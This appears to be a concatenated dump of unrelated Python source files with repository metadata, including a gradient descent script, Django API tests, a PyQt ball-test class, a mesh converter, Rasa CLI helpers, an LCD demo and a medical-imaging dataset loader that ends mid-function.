    vector, `theta` the parameter column vector; all np.matrix instances.
    """
    predictions = m_x * theta  # matrix product: hypothesis h = X * theta
    residuals = predictions - y
    sample_count = m_x.shape[0]
    return 1 / (2.0 * sample_count) * np.sum(np.square(residuals))
def gradient_descent(m_x, y, theta, alpha, num_iterations):
    """Batch gradient descent for linear regression.

    Returns the optimised parameters; `theta` itself is not modified
    (a copy is updated in place).
    NOTE(review): this relies on np.matrix operator semantics (`*` is a
    matrix product, broadcasting of the summed gradient) — confirm before
    porting to plain ndarrays.
    """
    theta_local = np.copy(theta)
    m = m_x.shape[0]
    for i in range(num_iterations):
        # Hypothesis values for all samples, shape (m, 1).
        h = (theta_local.T * m_x.T).T
        # Gradient step: alpha/m * X^T (h - y).
        theta_local -= alpha * 1 / m * np.multiply((h - y), m_x).T.sum(axis=1)
    return theta_local
def main():
    # Sorting appears unneeded here: J is a sum, so sample order should not
    # matter. (translated from the original Russian comments)
    #
    # Extract the two input column vectors from the ex1 data file.
    data = load('mlclass-ex1/ex1data1.txt')
    x = np.mat(data[:, :1])
    y = np.mat(data[:, 1:2])

    # Prepare data: prepend the bias column of ones.
    m = len(y)
    m_x = numpy.hstack([numpy.ones((m, 1)), x])

    # Params - zero starting point, turned into a column vector.
    theta = np.mat(numpy.zeros((1, 2))).T
    # Cost at the first iteration.
    # NOTE(review): `j` is computed only as an example and never used.
    j = compute_cost(m_x, y, theta)  # just example
    # Iteration settings.
    num_iterations = 1500
    alpha = 0.01
    # Find the minimising parameters.
    theta_opt = gradient_descent(m_x, y, theta, alpha, num_iterations)

    # Plot data and estimated line.
    line = m_x * theta_opt
    pylab.plot(x, y, '+', x, line, 'v')
    pylab.show()

if __name__ == '__main__':
    main()
| 19.468085 | 78 | 0.615301 |
81b20c0a66d5c408d957a27a29ad5039316e66bb
| 3,802 |
py
|
Python
|
watchlist_app/tests/test_watchlist_api.py
|
attachemd/moviedb
|
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
|
[
"MIT"
] | null | null | null |
watchlist_app/tests/test_watchlist_api.py
|
attachemd/moviedb
|
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
|
[
"MIT"
] | null | null | null |
watchlist_app/tests/test_watchlist_api.py
|
attachemd/moviedb
|
c2e3b7bc3c1537c64834c2ee94492122dafdfcd4
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from datetime import datetime
import django
from django.urls import reverse
from django.utils import timezone
from faker import Faker
from rest_framework.test import APIClient
from rest_framework import status
from core.models import WatchListModel
from watchlist_app.api.serializers import WatchListSerializer
from watchlist_app.tests.factories import WatchListFactory, StreamPlatformFactory
# Resolved list endpoint for the watchlist API.
MOVIES_URL = reverse('movie_list')

def movie_url_pk(pk):
    """Return the detail URL for the movie with primary key `pk`."""
    return reverse('movie_detail', kwargs={'pk': pk})

def sample_stream_platform(user, name='Main course'):
    """Create a stream platform fixture.

    NOTE(review): `user` and `name` are accepted but ignored — the factory
    decides all attributes; confirm callers rely on that before changing.
    """
    return StreamPlatformFactory()
def valid_watch_list(stream_platform_id):
    """Build a valid POST payload for a WatchList tied to the given platform."""
    return {
        'title': faker.company(),
        'platform': stream_platform_id,
        'storyline': faker.sentence(),
        'website': faker.url(),
        'active': faker.boolean(),
        # 'created': datetime.now().strftime("%A, %d. %B %Y %I:%M%p")
        # 'created': str(timezone.now())
        # 'created': datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        # 'created': datetime.now().strftime("%Y-%m-%d %H:%M[:%S[.uuuuuu]][TZ]")
        # 'created': datetime.now().strftime("YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]")
    }

# Module-level Faker instance; defined after valid_watch_list but before it
# is first called, so the late binding is safe.
faker = Faker()
class MoviesApiTests(TestCase):
    """Test the authorized user tags API"""

    def setUp(self):
        # Fresh API client plus one platform; payloads are rebuilt per test.
        self.client = APIClient()
        self.stream_platform = StreamPlatformFactory()
        self.valid_watch_list = valid_watch_list(self.stream_platform.id)
        self.invalid_watch_list = {
            'title': '',
        }

    def test_retrieve_movies(self):
        """Test retrieving tags"""
        WatchListFactory(platform=self.stream_platform)
        WatchListFactory(platform=self.stream_platform)
        res = self.client.get(MOVIES_URL)
        # The list endpoint must return exactly the serialized DB contents.
        movies = WatchListModel.objects.all()
        serializer = WatchListSerializer(movies, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)

    def test_create_movie_successful(self):
        """Test creating a new tag"""
        res = self.client.post(MOVIES_URL, self.valid_watch_list)
        # NOTE(review): debug prints left in — consider removing.
        print("res: ")
        print(res)
        # exists = WatchList.objects.filter(
        #     title=self.valid_watch_list['title'],
        #     about=self.valid_watch_list['about'],
        #     website=self.valid_watch_list['website'],
        #     active=self.valid_watch_list['active'],
        # ).exists()
        exists = WatchListModel.objects.filter(
            **self.valid_watch_list
        ).exists()
        self.assertTrue(exists)

    def test_create_movie_invalid(self):
        """Test creating a new tag with invalid payload"""
        res = self.client.post(MOVIES_URL, self.invalid_watch_list)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_valid_update_movie(self):
        """
        Validated data case
        """
        movie = WatchListFactory(platform=self.stream_platform)
        response = self.client.put(
            movie_url_pk(movie.pk),
            data=self.valid_watch_list
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_invalid_update_movie(self):
        """
        Invalid data case
        """
        movie = WatchListFactory(platform=self.stream_platform)
        response = self.client.put(
            movie_url_pk(movie.pk),
            data=self.invalid_watch_list
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_delete_movie(self):
        movie = WatchListFactory(platform=self.stream_platform)
        response = self.client.delete(movie_url_pk(movie.pk))
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
48402832da134998cb30b07c0cce5f9e6b5f65bd
| 5,628 |
py
|
Python
|
GUI/class_Bolita.py
|
AnuTor/UniNeuroLab
|
5825f440d4663650f038083f3da05229cc5ada4f
|
[
"Apache-2.0"
] | null | null | null |
GUI/class_Bolita.py
|
AnuTor/UniNeuroLab
|
5825f440d4663650f038083f3da05229cc5ada4f
|
[
"Apache-2.0"
] | null | null | null |
GUI/class_Bolita.py
|
AnuTor/UniNeuroLab
|
5825f440d4663650f038083f3da05229cc5ada4f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow
#from PyQt5.QtCore import Qt
import numpy as np
#import sys
#import time
global n  # NOTE(review): `global` at module scope is a no-op; kept as-is.
# Random permutation of 1..25: the target order for the balls in the test.
rango=np.arange(1,26)
n= np.random.permutation(rango)
## Create a second class (translated)
# Default stylesheet for an unpressed (white) ball.
st = str("border-radius : 15; border : 1px solid black")
#global st
class Bolitas():
    """One ball ("bolita") of the test, holding its geometry, identity,
    value and state so it can be manipulated as an object."""
    def __init__(self, setGeometry , t_Obj = QtWidgets.QPushButton, id = 0, valor = 0, estado = 0, setStyleSheet = st):
        #super(Bolitas, self).__init__()
        """ Create a new point at the origin """
        self.g1 = setGeometry[0] # X coordinate
        self.g2 = setGeometry[1] # Y coordinate
        self.g3 = setGeometry[2] # width
        self.g4 = setGeometry[3] # height
        # NOTE(review): the `t_Obj` argument is ignored — the attribute is
        # hard-coded to QtWidgets.QPushButton; confirm before relying on it.
        self.t_Obj= QtWidgets.QPushButton
        self.id = id
        self.valor = valor # may take values 1 to 25
        self.estado = estado # may have 3 states: white, green or red
        # NOTE(review): the `setStyleSheet` argument is ignored — the module
        # global `st` is always used instead.
        self.setStyleSheet = st
    '''
    def cambioColor(self):
        """ Este metodo hace que la bolita cambie de estado"""
        global estado #estado1
        global n
        global tr1
        global tr2
        global tr3
        global tr4
        global tr5
        print("El estado de la bolita", "es: ")
        print(estado)
        estado = estado +1
        #numero_estado1=numero_estado1+1
        if numero_estado1==n[0]:
            print("Color Verde")
            self.b1.setStyleSheet("background-color: green; color: white; border-radius : 15; border : 1px solid green")
            # Aqui hay que evaluar todas las codiciones relativas de todas las bolitas
            if tr2==1:
                self.b2.setStyleSheet("border-radius : 15; border : 1px solid black")
                tr2=0
            if tr3==1:
                self.b3.setStyleSheet("border-radius : 15; border : 1px solid black")
                tr3=0
            if tr4==1:
                self.b4.setStyleSheet("border-radius : 15; border : 1px solid black")
                tr4=0
            if tr5==1:
                self.b5.setStyleSheet("border-radius : 15; border : 1px solid black")
                tr5=0
        elif numero_estado1 != n[0] :
            print("Color Rojo")
            self.b1.setStyleSheet("background-color: red; color: white; border-radius : 15; border : 1px solid red")
            print("El número es mayor al esperado, elija el número siguiente al marcado en verde")
            numero_estado1=numero_estado1-1
            tr1=1 #Levanto el flag de que se presionó una bolita mayor a la esperada
        else:
            print("Color Negro")
            self.b1.setStyleSheet("border-radius : 15; border : 1px solid black")

    def contarIntentos(self):
        este metodo cuanta cuantos click se hacen sobre el boton-bolita
        return num_intentos
    '''
print("Me parece que cree la primer bolita")
#print("Este es n: ", n)
i= 0
# One press-counter per ball (1..25); presumably incremented on each click.
numero_estado1 = 0
numero_estado2 = 0
numero_estado3 = 0
numero_estado4 = 0
numero_estado5 = 0
numero_estado6 = 0
numero_estado7 = 0
numero_estado8 = 0
numero_estado9 = 0
numero_estado10 = 0
numero_estado11 = 0
numero_estado12 = 0
numero_estado13 = 0
numero_estado14 = 0
numero_estado15 = 0
numero_estado16 = 0
numero_estado17 = 0
numero_estado18 = 0
numero_estado19 = 0
numero_estado20 = 0
numero_estado21 = 0
numero_estado22 = 0
numero_estado23 = 0
numero_estado24 = 0
numero_estado25 = 0
# Create the 25 balls as Bolitas objects: geometry [x, y, w, h], widget type,
# string id, target value taken from the random permutation n, state, style.
b1 = Bolitas([400,400,30,30], QtWidgets.QPushButton, "1" , n[0], 0, st)
b2 = Bolitas([460,480,30,30], QtWidgets.QPushButton, "2" , n[1], 0, st)
b3 = Bolitas([250,450,30,30], QtWidgets.QPushButton, "3" , n[2], 0, st)
b4 = Bolitas([450,370,30,30] , QtWidgets.QPushButton, "4" , n[3], 0, st)
b5 = Bolitas([250,50,30,30], QtWidgets.QPushButton, "5" , n[4], 0, st)
b6 = Bolitas([20,470,30,30], QtWidgets.QPushButton, "6" , n[5], 0, st)
b7 = Bolitas([380,200,30,30], QtWidgets.QPushButton, "7" , n[6], 0, st)
b8 = Bolitas([200,200,30,30] , QtWidgets.QPushButton, "8" , n[7], 0, st)
b9 = Bolitas([250,350,30,30] , QtWidgets.QPushButton, "9" , n[8], 0, st)
b10 = Bolitas([180,280,30,30] , QtWidgets.QPushButton, "10", n[9], 0, st)
b11 = Bolitas([130,420,30,30], QtWidgets.QPushButton, "11", n[10],0, st)
b12 = Bolitas([420,130,30,30] , QtWidgets.QPushButton, "12", n[11],0, st)
b13 = Bolitas([200,90,30,30] , QtWidgets.QPushButton, "13", n[12],0, st)
b14 = Bolitas([330,290,30,30] , QtWidgets.QPushButton, "14", n[13],0, st)
b15 = Bolitas([150,370,30,30] , QtWidgets.QPushButton, "15", n[14],0, st)
b16 = Bolitas([380,80,30,30], QtWidgets.QPushButton, "16", n[15],0, st)
b17 = Bolitas([325,200,30,30], QtWidgets.QPushButton, "17", n[16],0, st)
b18 = Bolitas([270,300,30,30] , QtWidgets.QPushButton, "18", n[17],0, st)
b19 = Bolitas([20,180,30,30] , QtWidgets.QPushButton, "19", n[18],0, st)
b20 = Bolitas([35,320,30,30] , QtWidgets.QPushButton, "20", n[19],0, st)
b21 = Bolitas([90,360,30,30] , QtWidgets.QPushButton, "21", n[20],0, st)
b22 = Bolitas([95,140,30,30] , QtWidgets.QPushButton, "22", n[21],0, st)
b23 = Bolitas([70,220,30,30] , QtWidgets.QPushButton, "23", n[22],0, st)
b24 = Bolitas([180,150,30,30], QtWidgets.QPushButton, "24", n[23],0, st)
b25 = Bolitas([135,80,30,30] , QtWidgets.QPushButton, "25", n[24],0, st)
48500526498d8d068cf111ac518826fe54debc38
| 2,850 |
py
|
Python
|
tools/legacy/mw4-erf-converter/convertErf.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 2 |
2020-03-18T18:23:27.000Z
|
2020-08-02T15:59:16.000Z
|
tools/legacy/mw4-erf-converter/convertErf.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 5 |
2019-07-07T16:47:47.000Z
|
2020-08-10T16:20:00.000Z
|
tools/legacy/mw4-erf-converter/convertErf.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 1 |
2020-03-18T18:23:30.000Z
|
2020-03-18T18:23:30.000Z
|
import sys
import json
import glob
import readErf

# ERF files to convert are passed on the command line.
# NOTE(review): `json` and `glob` are imported but unused in this snippet.
importFilenames = sys.argv[1:]

# lower half of mech
# hip
# (l/r)uleg (u for upper)
# (l/r)mleg (m for middle)
# (l/r)dleg (d for down)
# (l/r)foot
# (l/r)ftoe (f for front)
# (l/r)btoe (b for back)
def getMaxMinY(items):
    """Return (max, min) of the Y components (index 1) of a point sequence.

    Fix: the original called map() without its iterable argument, which is a
    TypeError on every call.
    """
    ys = [point[1] for point in items]
    return (max(ys), min(ys))
def getMaxMinX(items):
    """Return (max, min) of the X components (index 0) of a point sequence.

    Fixes: map() was missing its iterable argument, and the return referenced
    the Y-function's names (maxY/minY), which are undefined here.
    """
    xs = [point[0] for point in items]
    return (max(xs), min(xs))
# Convert each .erf/.ERF mesh file into a Wavefront .obj next to it.
# NOTE: this file is Python 2 (print statements).
for importFilename in importFilenames:
    # Part name = basename without extension; export path swaps the extension.
    partName = importFilename.replace(".erf", "").replace(".ERF", "").split("/")[-1]
    exportFilename = importFilename.replace(".erf", ".obj").replace(".ERF", ".obj")
    try:
        print "reading " + importFilename
        with open(importFilename, "rb") as input_fd:
            # first get the parsed shape datastructures
            rawData = input_fd.read()
            # Sequentially decode the ERF stream; each reader returns the
            # advanced offset plus the decoded payload.
            offset, numLod = readErf.readLod(0, rawData)
            offset, numMeshes = readErf.readNumOfMeshes(offset, rawData)
            i = 0
            meshes = []
            while i < numMeshes:
                offset, numVerts = readErf.readNumOfVerts(offset, rawData)
                offset, verts = readErf.readVerts(offset, rawData, numVerts)
                offset, uvVerts = readErf.readUvVerts(offset, rawData)
                offset, name = readErf.readTextureName(offset, rawData)
                offset, numFaces = readErf.readNumFaces(offset, rawData)
                offset, faces = readErf.readFaces(offset, rawData, numFaces)
                offset, numPlanePoints = readErf.readNumPlanePoints(offset, rawData)
                offset, planePoints = readErf.readPlanePoints(offset, rawData, numPlanePoints)
                offset, numNormals = readErf.readNumNormalPoints(offset, rawData)
                offset, normals = readErf.readNormalPoints(offset, rawData, numNormals)
                meshes.append((name, verts, uvVerts, faces));
                i += 1
        print "writing " + exportFilename
        with open(exportFilename,"w") as shapeFile:
            # OBJ vertex indices are global and 1-based, hence the running
            # vertIndex offset and the +1 below.
            vertIndex = 0
            for index, mesh in enumerate(meshes):
                name, verts, uvVerts, faces = mesh
                shapeFile.write("g " + partName + "-" + str(index) + "\r\n")
                for vertex in verts:
                    shapeFile.write("\tv " + str(vertex[0]) + " " + str(vertex[1]) + " " + str(vertex[2]) + "\r\n")
                for face in faces:
                    shapeFile.write("\tf ")
                    for value in face:
                        shapeFile.write(str(value + 1 + vertIndex) + " ")
                    shapeFile.write("\r\n")
                vertIndex += len(verts)
    except Exception as e:
        # Best-effort batch conversion: report the failure and continue.
        print e
6f9de8cc9e026d9da1d97f7f0a7b2fd79f1bb7e9
| 51 |
py
|
Python
|
production/pygsl-0.9.5/gsl_dist/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
production/pygsl-0.9.5/gsl_dist/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/gsl_dist/__init__.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
# Just for declaration: expose only gsl_Extension as this package's public API.
__all__ = ["gsl_Extension"]
| 17 | 27 | 0.745098 |
d200b5abad2f5d2d4884a423bd1145df06bca377
| 763 |
py
|
Python
|
rasa/shared/utils/cli.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 1 |
2020-10-14T18:09:10.000Z
|
2020-10-14T18:09:10.000Z
|
rasa/shared/utils/cli.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | 187 |
2020-02-25T16:07:06.000Z
|
2022-03-01T13:42:41.000Z
|
rasa/shared/utils/cli.py
|
chaneyjd/rasa
|
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
|
[
"Apache-2.0"
] | null | null | null |
import sys
from typing import Any, Text, NoReturn
import rasa.shared.utils.io
def print_color(*args: Any, color: Text):
    """Print the given arguments wrapped in the given terminal color code."""
    colored_text = rasa.shared.utils.io.wrap_with_color(*args, color=color)
    print(colored_text)
def print_success(*args: Any):
    """Print the given arguments in green."""
    palette = rasa.shared.utils.io.bcolors
    print_color(*args, color=palette.OKGREEN)


def print_info(*args: Any):
    """Print the given arguments in blue."""
    palette = rasa.shared.utils.io.bcolors
    print_color(*args, color=palette.OKBLUE)


def print_warning(*args: Any):
    """Print the given arguments in the warning color."""
    palette = rasa.shared.utils.io.bcolors
    print_color(*args, color=palette.WARNING)


def print_error(*args: Any):
    """Print the given arguments in the failure color."""
    palette = rasa.shared.utils.io.bcolors
    print_color(*args, color=palette.FAIL)
def print_error_and_exit(message: Text, exit_code: int = 1) -> NoReturn:
    """Print an error message, then terminate the process with `exit_code`."""
    print_error(message)
    # Equivalent to sys.exit(exit_code): sys.exit just raises SystemExit.
    raise SystemExit(exit_code)
| 23.84375 | 72 | 0.731324 |
fb50513aa1e6c67b5d034dcff900c7f890e63cd9
| 519 |
py
|
Python
|
examples/lcd.py
|
Elecrow-RD/Raspberry-Pi-Starter-Kit
|
9adad7bfb403a697119bf80bbc2290bc3832750d
|
[
"MIT"
] | 1 |
2020-08-11T23:39:23.000Z
|
2020-08-11T23:39:23.000Z
|
examples/lcd.py
|
Elecrow-RD/Raspberry-Pi-Starter-Kit
|
9adad7bfb403a697119bf80bbc2290bc3832750d
|
[
"MIT"
] | null | null | null |
examples/lcd.py
|
Elecrow-RD/Raspberry-Pi-Starter-Kit
|
9adad7bfb403a697119bf80bbc2290bc3832750d
|
[
"MIT"
] | 1 |
2020-08-05T18:30:45.000Z
|
2020-08-05T18:30:45.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import time
import Adafruit_CharLCD as LCD

# Define LCD column and row size for 16x2 LCD.
# NOTE(review): lcd_columns/lcd_rows (and `sys`) are declared but unused here.
lcd_columns = 16
lcd_rows = 2

# Initialize the LCD using the pins (I2C backpack at address 0x21).
lcd = LCD.Adafruit_CharLCDBackpack(address=0x21)

try:
    # Refresh the greeting every 5 seconds until interrupted with Ctrl-C.
    while True:
        # Turn backlight on — presumably active-low (0 = on); confirm for
        # this backpack revision.
        lcd.set_backlight(0)
        # clean the LCD screen
        lcd.clear()
        lcd.message('Hello world')
        time.sleep(5)
except KeyboardInterrupt:
    # Turn the screen off
    lcd.clear()
    lcd.set_backlight(1)
f7cfec42dd43a1a13af0bbed528255972ca7cb62
| 11,408 |
py
|
Python
|
2DNet/src/dataset/dataset.py
|
BhaveshJP25/RSNA
|
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
|
[
"MIT"
] | null | null | null |
2DNet/src/dataset/dataset.py
|
BhaveshJP25/RSNA
|
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
|
[
"MIT"
] | null | null | null |
2DNet/src/dataset/dataset.py
|
BhaveshJP25/RSNA
|
48d85faf82651b1ae4fdcd829ce2d4978a858d3f
|
[
"MIT"
] | null | null | null |
import torch.utils.data as data
import torch
import albumentations
import cv2
import numpy as np
import random
import math
from settings import train_png_dir
def generate_transforms(image_size):
    """Build the (train, val) albumentations pipelines.

    Both pipelines are identical: resize to `image_size` square, then
    fixed-mean/std normalisation of 8-bit pixel values.
    """

    def _build_pipeline():
        return albumentations.Compose([
            albumentations.Resize(image_size, image_size),
            albumentations.Normalize(mean=(0.456, 0.456, 0.456),
                                     std=(0.224, 0.224, 0.224),
                                     max_pixel_value=255.0, p=1.0),
        ])

    # Two separate Compose objects, matching the original behaviour.
    return _build_pipeline(), _build_pipeline()
def generate_random_list(length):
    """Return indices 0..length-1 with mid-sequence indices repeated.

    Each index appears max(1, weight) times, where the weight grows towards
    the middle of the range — biasing a later random.choice towards
    mid-sequence slices.
    """
    weighted = []
    for index in range(length):
        if index <= length / 2:
            raw_weight = int(index / 4)
        else:
            raw_weight = int((length - index) / 4)
        weighted.extend([index] * max(1, raw_weight))
    return weighted
class RSNA_Dataset_train_by_study_context(data.Dataset):
    """Training dataset: for a sampled slice of a study, stack the slice with
    its upper/lower neighbours into a 3-channel image and return it with the
    per-class labels ('any'..'subdural')."""
    def __init__(self,
                 df = None,
                 name_list = None,
                 transform = None
                 ):
        # Keep only rows belonging to the given study UIDs.
        self.df = df[df['study_instance_uid'].isin(name_list)]
        self.name_list = name_list
        self.transform = transform

    def __getitem__(self, idx):
        # idx is taken modulo the study count because __len__ is inflated x4.
        study_name = self.name_list[idx % len(self.name_list)]
        study_train_df = self.df[self.df['study_instance_uid']==study_name]
        # NOTE(review): debug print left in the hot path — consider removing.
        print(study_train_df.head())
        # Sample a slice index, biased towards the middle of the study.
        study_index = random.choice(generate_random_list(study_train_df.shape[0]-1))
        slice_id = study_name + '_' + str(study_index)
        filename = study_train_df[study_train_df['slice_id']==slice_id]['filename'].values[0]

        # Neighbour above (clamped at the last slice).
        if study_index == (study_train_df.shape[0]-1):
            filename_up = filename
        else:
            slice_id_up = study_name + '_' + str(study_index+1)
            filename_up = study_train_df[study_train_df['slice_id']==slice_id_up]['filename'].values[0]

        # Neighbour below (clamped at the first slice).
        if study_index == 0:
            filename_down = filename
        else:
            slice_id_down = study_name + '_' + str(study_index-1)
            filename_down = study_train_df[study_train_df['slice_id']==slice_id_down]['filename'].values[0]
        # print(train_png_dir)
        # print("\n")
        # print(filename)
        # Read all three slices as grayscale and resize to 512x512.
        image = cv2.imread(train_png_dir + filename, 0)
        image = cv2.resize(image, (512, 512))
        image_up = cv2.imread(train_png_dir + filename_up, 0)
        image_up = cv2.resize(image_up, (512, 512))
        image_down = cv2.imread(train_png_dir + filename_down, 0)
        image_down = cv2.resize(image_down, (512, 512))

        # Stack neighbours as channels: (up, current, down).
        image_cat = np.concatenate([image_up[:,:,np.newaxis], image[:,:,np.newaxis], image_down[:,:,np.newaxis]],2)
        label = torch.FloatTensor(study_train_df[study_train_df['filename']==filename].loc[:, 'any': 'subdural'].values)

        # Randomly swap channel order as a cheap augmentation.
        if random.random() < 0.5:
            image_cat = cv2.cvtColor(image_cat, cv2.COLOR_BGR2RGB)

        image_cat = aug_image(image_cat, is_infer=False)

        if self.transform is not None:
            augmented = self.transform(image=image_cat)
            # HWC -> CHW for the model.
            image_cat = augmented['image'].transpose(2, 0, 1)
        # print(label)
        # exit(0)
        return image_cat, label

    def __len__(self):
        # Inflated x4 so each epoch samples several slices per study.
        return len(self.name_list) * 4
class RSNA_Dataset_val_by_study_context(data.Dataset):
    """Validation dataset: deterministic per-filename variant of the train
    dataset — same 3-slice channel stacking, inference-time augmentation."""
    def __init__(self,
                 df = None,
                 name_list = None,
                 transform = None
                 ):
        self.df = df
        self.name_list = name_list
        self.transform = transform

    def __getitem__(self, idx):
        # name_list holds filenames here (not study UIDs as in training).
        filename = self.name_list[idx % len(self.name_list)]
        filename_train_df = self.df[self.df['filename']==filename]
        study_name = filename_train_df['study_instance_uid'].values[0]
        study_index = int(filename_train_df['slice_id'].values[0].split('_')[-1])
        study_train_df = self.df[self.df['study_instance_uid']==study_name]

        # Neighbour above (clamped at the last slice).
        if study_index == (study_train_df.shape[0]-1):
            filename_up = filename
        else:
            slice_id_up = study_name + '_' + str(study_index+1)
            filename_up = study_train_df[study_train_df['slice_id']==slice_id_up]['filename'].values[0]

        # Neighbour below (clamped at the first slice).
        if study_index == 0:
            filename_down = filename
        else:
            slice_id_down = study_name + '_' + str(study_index-1)
            filename_down = study_train_df[study_train_df['slice_id']==slice_id_down]['filename'].values[0]

        # Read the three slices as grayscale and resize to 512x512.
        image = cv2.imread(train_png_dir + filename, 0)
        image = cv2.resize(image, (512, 512))
        image_up = cv2.imread(train_png_dir + filename_up, 0)
        image_up = cv2.resize(image_up, (512, 512))
        image_down = cv2.imread(train_png_dir + filename_down, 0)
        image_down = cv2.resize(image_down, (512, 512))

        # Stack neighbours as channels: (up, current, down).
        image_cat = np.concatenate([image_up[:,:,np.newaxis], image[:,:,np.newaxis], image_down[:,:,np.newaxis]],2)
        label = torch.FloatTensor(study_train_df[study_train_df['filename']==filename].loc[:, 'any':'subdural'].values)

        # Deterministic centre-crop augmentation for inference.
        image_cat = aug_image(image_cat, is_infer=True)

        if self.transform is not None:
            augmented = self.transform(image=image_cat)
            # HWC -> CHW for the model.
            image_cat = augmented['image'].transpose(2, 0, 1)
        return image_cat, label

    def __len__(self):
        return len(self.name_list)
def randomHorizontalFlip(image, u=0.5):
    """Mirror `image` left-right (cv2 axis 1) with probability `u`."""
    if np.random.random() < u:
        return cv2.flip(image, 1)
    return image
def randomVerticleFlip(image, u=0.5):
    """Mirror `image` top-bottom (cv2 axis 0) with probability `u`."""
    if np.random.random() < u:
        return cv2.flip(image, 0)
    return image
def randomRotate90(image, u=0.5):
    """Rotate the first three channels of `image` by 90 degrees (about the
    height/width axes) with probability `u`.

    Mutates `image` in place and returns it; assumes a square H == W image.
    """
    apply_rotation = np.random.random() < u
    if apply_rotation:
        image[:, :, 0:3] = np.rot90(image[:, :, 0:3])
    return image
#===================================================origin=============================================================
def random_cropping(image, ratio=0.8, is_random = True):
    """Crop a `ratio`-sized window (random position when `is_random`,
    centred otherwise) and resize it back to the original resolution."""
    height, width, _ = image.shape
    crop_h = int(height * ratio)
    crop_w = int(width * ratio)

    if is_random:
        # Draw x first, then y, keeping the original RNG consumption order.
        off_x = random.randint(0, width - crop_w)
        off_y = random.randint(0, height - crop_h)
    else:
        off_x = (width - crop_w) // 2
        off_y = (height - crop_h) // 2

    window = image[off_y:off_y + crop_h, off_x:off_x + crop_w, :]
    return cv2.resize(window, (width, height))
def cropping(image, ratio=0.8, code = 0):
    """Deterministic crop + resize. `code` selects the window position:
    0 = centre, 1 = top-left, 2 = top-right, 3 = bottom-left,
    4 = bottom-right, -1 = return `image` unchanged (no resize)."""
    height, width, _ = image.shape
    crop_h = int(height * ratio)
    crop_w = int(width * ratio)

    if code == -1:
        return image
    if code == 0:
        off_x, off_y = (width - crop_w) // 2, (height - crop_h) // 2
    elif code == 1:
        off_x, off_y = 0, 0
    elif code == 2:
        off_x, off_y = width - crop_w, 0
    elif code == 3:
        off_x, off_y = 0, height - crop_h
    elif code == 4:
        off_x, off_y = width - crop_w, height - crop_h

    window = image[off_y:off_y + crop_h, off_x:off_x + crop_w, :]
    return cv2.resize(window, (width, height))
def random_erasing(img, probability=0.5, sl=0.02, sh=0.4, r1=0.3):
    """Random Erasing augmentation: with `probability`, zero out one random
    rectangle covering sl..sh of the image area with aspect ratio in
    [r1, 1/r1]. Mutates `img` in place and returns it.

    Fix: the unexpected-channel-count branch previously did a bare ``return``
    (i.e. returned None), which crashes downstream consumers expecting an
    image; it now warns and returns `img` unchanged.
    """
    if random.uniform(0, 1) > probability:
        return img

    # Rejection-sample a rectangle that fits inside the image.
    for attempt in range(100):
        area = img.shape[0] * img.shape[1]

        target_area = random.uniform(sl, sh) * area
        aspect_ratio = random.uniform(r1, 1 / r1)

        h = int(round(math.sqrt(target_area * aspect_ratio)))
        w = int(round(math.sqrt(target_area / aspect_ratio)))

        if w < img.shape[1] and h < img.shape[0]:
            x1 = random.randint(0, img.shape[0] - h)
            y1 = random.randint(0, img.shape[1] - w)
            if img.shape[2] == 3:
                img[x1:x1 + h, y1:y1 + w, :] = 0.0
            else:
                print('!!!!!!!! random_erasing dim wrong!!!!!!!!!!!')
                return img
            return img

    return img
def randomShiftScaleRotate(image,
                           shift_limit=(-0.0, 0.0),
                           scale_limit=(-0.0, 0.0),
                           rotate_limit=(-0.0, 0.0),
                           aspect_limit=(-0.0, 0.0),
                           borderMode=cv2.BORDER_CONSTANT, u=0.5):
    """With probability `u`, apply a random affine-style warp (shift, scale,
    aspect change, rotation) implemented via a perspective transform.
    Limits are relative ranges; defaults are all zero (identity warp)."""
    if np.random.random() < u:
        height, width, channel = image.shape

        # Sample the warp parameters within the given relative limits.
        angle = np.random.uniform(rotate_limit[0], rotate_limit[1])
        scale = np.random.uniform(1 + scale_limit[0], 1 + scale_limit[1])
        aspect = np.random.uniform(1 + aspect_limit[0], 1 + aspect_limit[1])
        # Split the aspect change between x and y scale factors.
        sx = scale * aspect / (aspect ** 0.5)
        sy = scale / (aspect ** 0.5)
        dx = round(np.random.uniform(shift_limit[0], shift_limit[1]) * width)
